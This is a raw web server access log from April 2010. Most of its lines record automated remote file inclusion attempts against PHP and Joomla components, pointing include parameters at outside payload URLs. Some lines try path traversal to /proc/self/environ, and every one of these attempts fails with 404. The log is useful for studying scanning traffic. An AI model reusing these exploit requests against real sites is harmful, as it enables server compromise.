79.98.23.9 - - [16/Apr/2010:03:53:53 -0400] "GET /logs/access_log.Q110040700%20%20/////components/com_rsgallery/rsgallery.html.php?mosConfig.absolute.path=http://www.howtolisten.kr/lct/exam3/111/id1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
79.98.23.9 - - [16/Apr/2010:03:53:54 -0400] "GET /logs/////components/com_rsgallery/rsgallery.html.php?mosConfig.absolute.path=http://www.howtolisten.kr/lct/exam3/111/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
94.247.178.106 - - [16/Apr/2010:03:54:06 -0400] "GET /logs/access_log.Q110012600%20%20/////_?SERVER[DOCUMENT_ROOT]=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
209.126.254.139 - - [16/Apr/2010:03:54:22 -0400] "GET ///bbs/write_update.php?board_skin_path=http://armillum.com/tienda/qboard/id1.txt??? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
209.126.254.139 - - [16/Apr/2010:03:54:22 -0400] "GET /logs///bbs/write_update.php?board_skin_path=http://armillum.com/tienda/qboard/id1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
209.126.254.139 - - [16/Apr/2010:03:54:22 -0400] "GET /logs/access_log.Q109051600///bbs/write_update.php?board_skin_path=http://armillum.com/tienda/qboard/id1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
209.126.254.139 - - [16/Apr/2010:03:54:30 -0400] "GET ///bbs/write_update.php?board_skin_path=http://armillum.com/tienda/qboard/id1.txt??? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
209.126.254.139 - - [16/Apr/2010:03:54:30 -0400] "GET /logs///bbs/write_update.php?board_skin_path=http://armillum.com/tienda/qboard/id1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
209.126.254.139 - - [16/Apr/2010:03:54:30 -0400] "GET /logs/access_log.Q110021000///bbs/write_update.php?board_skin_path=http://armillum.com/tienda/qboard/id1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
209.126.254.139 - - [16/Apr/2010:03:54:32 -0400] "GET /logs///bbs/write_update.php?board_skin_path=http://armillum.com/tienda/qboard/id1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
209.126.254.139 - - [16/Apr/2010:03:54:32 -0400] "GET /logs/access_log.Q110021000%20%20///bbs/write_update.php?board_skin_path=http://armillum.com/tienda/qboard/id1.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
209.126.254.139 - - [16/Apr/2010:03:54:33 -0400] "GET /logs/access_log.Q109051600///bbs/write_update.php?board_skin_path=http://armillum.com/tienda/qboard/id1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
209.126.254.139 - - [16/Apr/2010:03:54:35 -0400] "GET ///bbs/write_update.php?board_skin_path=http://armillum.com/tienda/qboard/id1.txt??? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
209.126.254.139 - - [16/Apr/2010:03:54:35 -0400] "GET /logs///bbs/write_update.php?board_skin_path=http://armillum.com/tienda/qboard/id1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
209.126.254.139 - - [16/Apr/2010:03:54:35 -0400] "GET /logs/access_log.Q110021000%20%20///bbs/write_update.php?board_skin_path=http://armillum.com/tienda/qboard/id1.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
209.126.254.139 - - [16/Apr/2010:03:54:36 -0400] "GET /logs/access_log.Q109051600%20%20///bbs/write_update.php?board_skin_path=http://armillum.com/tienda/qboard/id1.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
209.126.254.139 - - [16/Apr/2010:03:54:40 -0400] "GET /logs/access_log.Q109051600%20%20///bbs/write_update.php?board_skin_path=http://armillum.com/tienda/qboard/id1.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
209.126.254.139 - - [16/Apr/2010:03:54:45 -0400] "GET /logs/access_log.Q109071600///bbs/write_update.php?board_skin_path=http://armillum.com/tienda/qboard/id1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
217.73.226.100 - - [16/Apr/2010:03:54:57 -0400] "GET /logs/access_log.Q110040500/////_?SERVER[DOCUMENT_ROOT]=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
79.98.23.9 - - [16/Apr/2010:03:54:58 -0400] "GET /logs/error_log.Q109061900%20%20/////components/com_rsgallery/rsgallery.html.php?mosConfig.absolute.path=http://www.howtolisten.kr/lct/exam3/111/id1.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
74.200.89.25 - - [16/Apr/2010:03:54:59 -0400] "GET /logs/error_log.Q109082600//config/dbutil.bck.php?confdir=http://www.hantechsys.com/board/a/id1?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
74.200.89.25 - - [16/Apr/2010:03:54:59 -0400] "GET /logs/access_log.Q109081300//config/dbutil.bck.php?confdir=http://www.hantechsys.com/board/a/id1?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
74.200.89.25 - - [16/Apr/2010:03:55:02 -0400] "GET /logs/error_log.Q109082600//config/dbutil.bck.php?confdir=http://www.hantechsys.com/board/a/id1?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
74.200.89.25 - - [16/Apr/2010:03:55:02 -0400] "GET /logs/access_log.Q109081300//config/dbutil.bck.php?confdir=http://www.hantechsys.com/board/a/id1?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
79.98.23.9 - - [16/Apr/2010:03:55:29 -0400] "GET /logs/////components/com_rsgallery/rsgallery.html.php?mosConfig.absolute.path=http://www.howtolisten.kr/lct/exam3/111/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
79.98.23.9 - - [16/Apr/2010:03:55:29 -0400] "GET /////components/com_rsgallery/rsgallery.html.php?mosConfig.absolute.path=http://www.howtolisten.kr/lct/exam3/111/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
79.98.23.9 - - [16/Apr/2010:03:55:29 -0400] "GET /logs/access_log.Q110040700/////components/com_rsgallery/rsgallery.html.php?mosConfig.absolute.path=http://www.howtolisten.kr/lct/exam3/111/id1.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
82.22.207.181 - - [16/Apr/2010:03:55:38 -0400] "GET /logs/////_?SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
82.22.207.181 - - [16/Apr/2010:03:55:39 -0400] "GET /logs/access_log.Q110012600/////_?SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
82.22.207.181 - - [16/Apr/2010:03:55:39 -0400] "GET /////_?SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 203 "-" "Mozilla/5.0"
174.121.24.1 - - [16/Apr/2010:03:55:41 -0400] "GET /logs/error_log.Q110040500%20%20/////_?SERVER[DOCUMENT_ROOT]=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
84.40.30.37 - - [16/Apr/2010:03:55:43 -0400] "GET /logs/access_log.Q109072300//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
94.247.178.106 - - [16/Apr/2010:03:55:49 -0400] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
94.247.178.106 - - [16/Apr/2010:03:55:49 -0400] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
94.247.178.106 - - [16/Apr/2010:03:55:49 -0400] "GET /logs/error_log.Q109100600%20%20//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
69.175.12.18 - - [16/Apr/2010:03:55:52 -0400] "GET //web/index.php?option=com_joomap&mosConfig.absolute.path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
69.175.12.18 - - [16/Apr/2010:03:55:52 -0400] "GET /logs//web/index.php?option=com_joomap&mosConfig.absolute.path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
69.175.12.18 - - [16/Apr/2010:03:55:52 -0400] "GET /logs/access_log.Q109092600//web/index.php?option=com_joomap&mosConfig.absolute.path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
69.175.12.18 - - [16/Apr/2010:03:56:05 -0400] "GET /logs/access_log.Q109100600//web/index.php?option=com_joomap&mosConfig.absolute.path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
94.247.178.106 - - [16/Apr/2010:03:56:14 -0400] "GET /logs/error_log.Q110010600%20%20//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
116.122.36.61 - - [16/Apr/2010:03:56:43 -0400] "GET /.php?site_path=http://takesi.freewebhostx.com/fx29id1.txt??????? HTTP/1.1" 404 202 "-" "Mozilla/5.0"
116.122.36.61 - - [16/Apr/2010:03:56:48 -0400] "GET /logs/.php?site_path=http://takesi.freewebhostx.com/fx29id1.txt??????? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
116.122.36.61 - - [16/Apr/2010:03:56:51 -0400] "GET /.php?site_path=http://takesi.freewebhostx.com/fx29id1.txt??????? HTTP/1.1" 404 202 "-" "Mozilla/5.0"
116.122.36.61 - - [16/Apr/2010:03:56:56 -0400] "GET /logs/.php?site_path=http://takesi.freewebhostx.com/fx29id1.txt??????? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
66.249.67.232 - - [16/Apr/2010:03:57:40 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L01521D5E33823800043D047+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
116.122.36.61 - - [16/Apr/2010:03:58:04 -0400] "GET /logs/access_log.Q109091800%20%20/.php?site_path=http://takesi.freewebhostx.com/fx29id1.txt??????? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
209.59.12.99 - - [16/Apr/2010:03:58:10 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
116.122.36.61 - - [16/Apr/2010:03:58:13 -0400] "GET /logs/access_log.Q109091800%20%20/.php?site_path=http://takesi.freewebhostx.com/fx29id1.txt??????? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
79.98.23.9 - - [16/Apr/2010:03:58:20 -0400] "GET /logs/access_log.Q110022700/////components/com_rsgallery/rsgallery.html.php?mosConfig.absolute.path=http://www.howtolisten.kr/lct/exam3/111/id1.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
94.247.178.106 - - [16/Apr/2010:03:59:32 -0400] "GET /logs/error_log.Q110040500%20%20/////_?SERVER[DOCUMENT_ROOT]=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
119.235.18.81 - - [16/Apr/2010:03:59:52 -0400] "GET /logs/////_?SERVER[DOCUMENT_ROOT]=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
119.235.18.81 - - [16/Apr/2010:03:59:52 -0400] "GET /logs/access_log.Q110012600/////_?SERVER[DOCUMENT_ROOT]=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
119.235.18.81 - - [16/Apr/2010:03:59:53 -0400] "GET /////_?SERVER[DOCUMENT_ROOT]=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 203 "-" "Mozilla/5.0"
78.110.50.133 - - [16/Apr/2010:04:00:06 -0400] "GET //zero_vote/ask_password.php?dir=http://www.fruehaufsteher.de/hpmaker/id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
78.110.50.133 - - [16/Apr/2010:04:00:06 -0400] "GET /logs//zero_vote/ask_password.php?dir=http://www.fruehaufsteher.de/hpmaker/id1.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
78.110.50.133 - - [16/Apr/2010:04:00:08 -0400] "GET //zero_vote/ask_password.php?dir=http://www.fruehaufsteher.de/hpmaker/id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
78.110.50.133 - - [16/Apr/2010:04:00:08 -0400] "GET /logs//zero_vote/ask_password.php?dir=http://www.fruehaufsteher.de/hpmaker/id1.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
78.110.50.133 - - [16/Apr/2010:04:00:08 -0400] "GET /logs/access_log.Q109110900//zero_vote/ask_password.php?dir=http://www.fruehaufsteher.de/hpmaker/id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
78.110.50.133 - - [16/Apr/2010:04:00:08 -0400] "GET /logs//zero_vote/ask_password.php?dir=http://www.fruehaufsteher.de/hpmaker/id1.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
78.110.50.133 - - [16/Apr/2010:04:00:08 -0400] "GET //zero_vote/ask_password.php?dir=http://www.fruehaufsteher.de/hpmaker/id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
78.110.50.133 - - [16/Apr/2010:04:00:11 -0400] "GET /logs/access_log.Q109110900//zero_vote/ask_password.php?dir=http://www.fruehaufsteher.de/hpmaker/id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
78.110.50.133 - - [16/Apr/2010:04:00:11 -0400] "GET /logs/access_log.Q109110900//zero_vote/ask_password.php?dir=http://www.fruehaufsteher.de/hpmaker/id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
78.110.50.133 - - [16/Apr/2010:04:00:19 -0400] "GET /logs/access_log.Q109110400//zero_vote/ask_password.php?dir=http://www.fruehaufsteher.de/hpmaker/id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
78.110.50.133 - - [16/Apr/2010:04:00:23 -0400] "GET /logs/access_log.Q109110400//zero_vote/ask_password.php?dir=http://www.fruehaufsteher.de/hpmaker/id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
78.110.50.133 - - [16/Apr/2010:04:00:23 -0400] "GET /logs/access_log.Q109110400//zero_vote/ask_password.php?dir=http://www.fruehaufsteher.de/hpmaker/id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
67.195.114.252 - - [16/Apr/2010:04:00:11 -0400] "GET /logs/error_log.Q109102800 HTTP/1.0" 200 3407525 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
69.175.12.18 - - [16/Apr/2010:04:00:54 -0400] "GET /logs/access_log.Q109092600%20%20//web/index.php?option=com_joomap&mosConfig.absolute.path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
69.175.12.18 - - [16/Apr/2010:04:00:54 -0400] "GET /logs/access_log.Q109100600%20%20//web/index.php?option=com_joomap&mosConfig.absolute.path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
66.249.67.232 - - [16/Apr/2010:04:03:20 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0151455103B10600838B01F+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
174.121.24.1 - - [16/Apr/2010:04:03:39 -0400] "GET /logs/access_log.Q109123100%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 303 "-" "Mozilla/5.0"
174.121.24.1 - - [16/Apr/2010:04:03:39 -0400] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
174.121.24.1 - - [16/Apr/2010:04:03:39 -0400] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
174.121.24.1 - - [16/Apr/2010:04:03:39 -0400] "GET /logs/error_log.Q109123100%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 302 "-" "Mozilla/5.0"
94.247.178.106 - - [16/Apr/2010:04:03:55 -0400] "GET /logs/access_log.Q109072400//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
88.12.145.219 - - [16/Apr/2010:04:04:08 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)"
88.12.145.219 - - [16/Apr/2010:04:04:08 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)"
88.12.145.219 - - [16/Apr/2010:04:04:12 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)"
88.12.145.219 - - [16/Apr/2010:04:04:12 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)"
88.12.145.219 - - [16/Apr/2010:04:04:15 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)"
88.12.145.219 - - [16/Apr/2010:04:04:15 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)"
88.12.145.219 - - [16/Apr/2010:04:04:16 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)"
88.12.145.219 - - [16/Apr/2010:04:04:16 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)"
94.247.178.106 - - [16/Apr/2010:04:05:10 -0400] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
94.247.178.106 - - [16/Apr/2010:04:05:10 -0400] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
94.247.178.106 - - [16/Apr/2010:04:05:10 -0400] "GET /logs/access_log.Q109123100%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 303 "-" "Mozilla/5.0"
94.247.178.106 - - [16/Apr/2010:04:05:10 -0400] "GET /logs/error_log.Q109123100%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 302 "-" "Mozilla/5.0"
78.110.50.133 - - [16/Apr/2010:04:05:48 -0400] "GET /logs/access_log.Q109110900%20%20//zero_vote/ask_password.php?dir=http://www.fruehaufsteher.de/hpmaker/id1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
78.110.50.133 - - [16/Apr/2010:04:05:52 -0400] "GET /logs/access_log.Q109110900%20%20//zero_vote/ask_password.php?dir=http://www.fruehaufsteher.de/hpmaker/id1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
78.110.50.133 - - [16/Apr/2010:04:05:52 -0400] "GET /logs/access_log.Q109110900%20%20//zero_vote/ask_password.php?dir=http://www.fruehaufsteher.de/hpmaker/id1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
78.110.50.133 - - [16/Apr/2010:04:05:53 -0400] "GET /logs/access_log.Q109110400%20%20//zero_vote/ask_password.php?dir=http://www.fruehaufsteher.de/hpmaker/id1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
78.110.50.133 - - [16/Apr/2010:04:05:54 -0400] "GET /logs/access_log.Q109110400%20%20//zero_vote/ask_password.php?dir=http://www.fruehaufsteher.de/hpmaker/id1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
78.110.50.133 - - [16/Apr/2010:04:05:55 -0400] "GET /logs/access_log.Q109110400%20%20//zero_vote/ask_password.php?dir=http://www.fruehaufsteher.de/hpmaker/id1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
209.59.12.99 - - [16/Apr/2010:04:06:11 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
217.73.226.100 - - [16/Apr/2010:04:06:16 -0400] "GET /logs/error_log.Q110040500/////_?SERVER[DOCUMENT_ROOT]=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
200.175.239.226 - - [16/Apr/2010:04:06:18 -0400] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://125.249.199.195/php/bbs//bash/yes.txt???? HTTP/1.1" 404 251 "-" "libwww-perl/5.805"
200.175.239.226 - - [16/Apr/2010:04:06:18 -0400] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://125.249.199.195/php/bbs//bash/yes.txt???? HTTP/1.1" 404 246 "-" "libwww-perl/5.805"
200.175.239.226 - - [16/Apr/2010:04:06:18 -0400] "GET /logs/access_log.Q109070300//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://125.249.199.195/php/bbs//bash/yes.txt???? HTTP/1.1" 404 273 "-" "libwww-perl/5.805"
74.86.210.130 - - [16/Apr/2010:04:06:19 -0400] "GET /logs/access_log.Q109111300/index.php?option=com_projectfork§ion=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.810"
74.86.210.130 - - [16/Apr/2010:04:06:20 -0400] "GET /index.php?option=com_projectfork§ion=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.810"
74.86.210.130 - - [16/Apr/2010:04:06:20 -0400] "GET /logs/index.php?option=com_projectfork§ion=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.810"
217.73.226.100 - - [16/Apr/2010:04:06:20 -0400] "GET /logs/access_log.Q110040500/////_?SERVER[DOCUMENT_ROOT]=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
217.73.226.100 - - [16/Apr/2010:04:06:29 -0400] "GET /logs/access_log.Q110040500/////_?SERVER[DOCUMENT_ROOT]=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
74.86.210.130 - - [16/Apr/2010:04:06:51 -0400] "GET /logs/error_log.Q109110300/index.php?option=com_projectfork§ion=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 233 "-" "libwww-perl/5.810"
200.175.239.226 - - [16/Apr/2010:04:07:08 -0400] "GET /logs/access_log.Q109080600//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://125.249.199.195/php/bbs//bash/yes.txt???? HTTP/1.1" 404 273 "-" "libwww-perl/5.805"
217.73.226.100 - - [16/Apr/2010:04:07:45 -0400] "GET /logs/error_log.Q110040500/////_?SERVER[DOCUMENT_ROOT]=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
69.175.12.18 - - [16/Apr/2010:04:07:48 -0400] "GET ////index.php?option=com_joomap&mosConfig.absolute.path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
69.175.12.18 - - [16/Apr/2010:04:07:48 -0400] "GET /logs////index.php?option=com_joomap&mosConfig.absolute.path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
69.175.12.18 - - [16/Apr/2010:04:07:48 -0400] "GET /logs/access_log.Q109092600////index.php?option=com_joomap&mosConfig.absolute.path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
67.222.152.66 - - [16/Apr/2010:04:07:49 -0400] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
67.222.152.66 - - [16/Apr/2010:04:07:49 -0400] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
67.222.152.66 - - [16/Apr/2010:04:07:49 -0400] "GET /logs/access_log.Q109062900//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
67.222.152.66 - - [16/Apr/2010:04:07:49 -0400] "GET /logs/access_log.Q109062900//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
67.222.152.66 - - [16/Apr/2010:04:07:49 -0400] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
67.222.152.66 - - [16/Apr/2010:04:07:49 -0400] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
69.175.12.18 - - [16/Apr/2010:04:07:53 -0400] "GET ////index.php?option=com_joomap&mosConfig.absolute.path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
69.175.12.18 - - [16/Apr/2010:04:07:53 -0400] "GET /logs/access_log.Q109092600%20%20////index.php?option=com_joomap&mosConfig.absolute.path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
69.175.12.18 - - [16/Apr/2010:04:07:53 -0400] "GET /logs////index.php?option=com_joomap&mosConfig.absolute.path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
69.175.12.18 - - [16/Apr/2010:04:07:55 -0400] "GET /logs/access_log.Q109100100////index.php?option=com_joomap&mosConfig.absolute.path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
60.248.160.127 - - [16/Apr/2010:04:07:59 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-TW; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
60.248.160.127 - - [16/Apr/2010:04:07:59 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-TW; rv:1.9.2.3) Gecko/20100401 Fir